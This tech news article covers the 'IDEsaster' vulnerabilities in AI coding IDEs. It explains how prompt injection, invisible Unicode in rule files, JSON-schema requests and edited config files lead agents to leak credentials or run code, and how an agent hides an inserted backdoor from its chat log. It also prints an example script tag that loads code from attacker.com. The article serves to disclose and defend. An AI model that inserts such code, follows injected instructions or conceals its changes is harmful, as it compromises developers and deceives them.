
Security researchers uncovered over 30 critical vulnerabilities in popular AI coding tools security—GitHub Copilot, Cursor, Windsurf, and others—affecting millions of developers. Published December 6, 2025, the research dubbed “IDEsaster” by Ari Marzouk reveals that 100% of tested AI IDEs are vulnerable to attacks enabling data theft and remote code execution through prompt injection, hidden Unicode characters, and weaponized IDE features. With 84% of developers now using AI coding tools (up from 76% in 2024), yet trust falling to just 33%, these vulnerabilities validate developers’ mistrust.
100% of AI IDEs Vulnerable to IDEsaster Attack Chain
IDEsaster is a newly identified vulnerability class affecting all tested AI-powered IDEs. The attack chain combines three elements: (1) prompt injection to bypass guardrails, (2) autonomous agent actions without user interaction, and (3) weaponized IDE features that were safe in traditional IDEs but become dangerous when AI can manipulate them autonomously. 24 CVEs have been assigned across 10+ market-leading products, including GitHub Copilot (CVE-2025-53773, CVE-2025-64660), Cursor (CVE-2025-49150, CVE-2025-54130, CVE-2025-61590), Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, and Cline.
Ari Marzouk explains the fundamental flaw: “AI IDEs effectively ignore the base software in their threat model. They treat their features as inherently safe because they’ve been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives.” This isn’t one vendor screwing up—it’s 100% of AI IDEs sharing the same flawed security model.
Moreover, Marzouk coined the “Secure for AI” paradigm to address this systemic issue: products must now be designed keeping in mind how AI components can be abused, not just secured by default. Features that worked safely for decades under human control become attack vectors when AI agents operate autonomously.
Hidden Unicode Characters Inject Invisible Backdoors
Pillar Security researchers discovered the “Rules File Backdoor” vulnerability where attackers embed invisible Unicode characters—zero-width joiners, bidirectional text markers—in configuration files. These characters are undetectable to human code reviewers but fully parseable by AI models, causing AI to inject backdoors while suppressing mention of changes in chat logs. Consequently, rule files are widely shared on Reddit, GitHub Gists, and Discord, treated as “harmless configuration” rather than executable code subject to security review.
The attack works insidiously. A developer requests “Create a simple HTML page,” and the AI generates code with a malicious <script src="https://attacker.com/malicious.js"></script> tag. The chat log shows only “I’ve created a simple HTML page with a heading”—no mention of the script tag. Furthermore, GitHub added hidden Unicode warnings after disclosure, but only on github.com’s web interface. Local editors, VS Code, and other tools don’t show warnings, meaning developers often miss the threat when reviewing code locally.
The supply chain implications are severe. Malicious repositories get forked, AI generates backdoored code, and it ships to production. Anthropic’s SQLite MCP server was forked over 5,000 times before being archived, spreading vulnerable code across thousands of downstream projects. Even after patching the original, those forks remain compromised.
These Flaws Validate the Trust Paradox: 84% Use, 33% Trust
Stack Overflow’s 2025 Developer Survey shows 84% adoption of AI coding tools (up from 76% in 2024), yet trust dropped from 42% to 33%. In fact, 46% actively distrust AI accuracy—only 3% report “highly trusting” the output. These IDEsaster vulnerabilities explain exactly WHY developers’ instincts were correct: the tools aren’t secure enough to trust.
Related: AI Coding Tools: 85% Adoption, 29% Trust—The Paradox
The data backs up security concerns: 87% of developers worry about AI tool accuracy, 81% about security and privacy, and 66% spend more time fixing “almost-right” AI-generated code. Additionally, 50% of AI-generated code contains known vulnerabilities like SQL injection and XSS. Enterprises encounter 10,000+ new security issues monthly from AI-produced code—a 10× increase in vulnerability introduction despite only 4× velocity gains.
Developers use tools they don’t trust because productivity gains outweigh security concerns—for now. However, these vulnerabilities could trigger enterprises to ban AI coding tools until vendors fix systemic security issues. The trade-off between speed and security is getting harder to justify.
How the Attacks Work: JSON Schema Theft and Config RCE
Two primary attack methods dominate: JSON schema data theft and configuration file remote code execution. In JSON schema attacks (CVE-2025-49150 for Cursor, CVE-2025-53097 for Roo Code, CVE-2025-58335 for Junie), prompt-injected AI reads sensitive files like environment variables and credentials, then generates JSON with a malicious remote schema. When the IDE validates the JSON, it makes a GET request to the attacker’s server, leaking sensitive data in URL parameters. No user interaction required.
Configuration file RCE attacks are equally dangerous. Malicious prompts cause AI to modify IDE settings, changing executable paths to achieve remote code execution on developer machines. GitHub Copilot (CVE-2025-53773) and Cursor (CVE-2025-54130) are both vulnerable. The CurXecute vulnerability (CVE-2025-54135, CVSS 8.6) demonstrates the risk: prompt injection modifies Cursor’s mcp.json configuration file, and changes are auto-executed without user approval.
These aren’t theoretical attacks. In mid-2025, Supabase’s Cursor agent, running with privileged service-role access, processed support tickets containing user-supplied input as commands. Therefore, attackers embedded SQL instructions that read and exfiltrated sensitive integration tokens, leaking them into a public support thread. Real-world exploitation is already happening.
What Developers Should Do Now
Immediate actions for developers using AI coding tools: Only use AI IDEs with trusted projects and files—malicious rule files, hidden instructions in source code, even file names can become prompt injection vectors. Configure human-in-the-loop verification for file operations and command execution where supported. Audit rule files for hidden Unicode characters using detection tools (check for zero-width joiners, bidirectional markers). Only connect to trusted MCP servers and continuously monitor them for changes. Manually inspect all AI-generated code—don’t rely on chat log transparency, because AI can suppress evidence of compromise.
For vendors, Marzouk’s “Secure for AI” paradigm requires capability-scoped tools implementing least privilege for LLM actions. Assume prompt injection is always possible and design defenses that don’t rely on perfect prompt security. Use sandboxing for command execution to isolate agent actions from the system. Perform rigorous security testing for path traversal, information leakage, and command injection vulnerabilities.
Vendors initially disputed responsibility—GitHub and Cursor stated “users are accountable for reviewing AI suggestions.” But how can users detect INVISIBLE Unicode characters? Gradually, vendors are implementing fixes: GitHub’s hidden Unicode warnings, sandboxing improvements, and stricter MCP server controls. Nevertheless, until systemic security improves, treat AI coding tools as untrusted: separate environments for AI-assisted versus sensitive work, and audit configuration files with the same scrutiny as executable code.
Key Takeaways
- 30+ vulnerabilities affect GitHub Copilot, Cursor, Windsurf, and others—24 CVEs assigned, 100% of tested AI IDEs vulnerable to IDEsaster attack chain
- Hidden Unicode characters in rule files inject invisible backdoors that human code reviewers can’t detect but AI models parse and execute
- Stack Overflow data validates mistrust: 84% adoption with only 33% trust, 50% of AI-generated code contains vulnerabilities, 10,000+ new security issues monthly
- Real attacks are happening—Supabase incident proves JSON schema theft and config RCE aren’t theoretical; attackers exfiltrated tokens via compromised Cursor agent
- Developers must treat AI coding tools as untrusted: use only with safe projects, audit rule files for Unicode attacks, require human-in-the-loop verification, and manually inspect all generated code






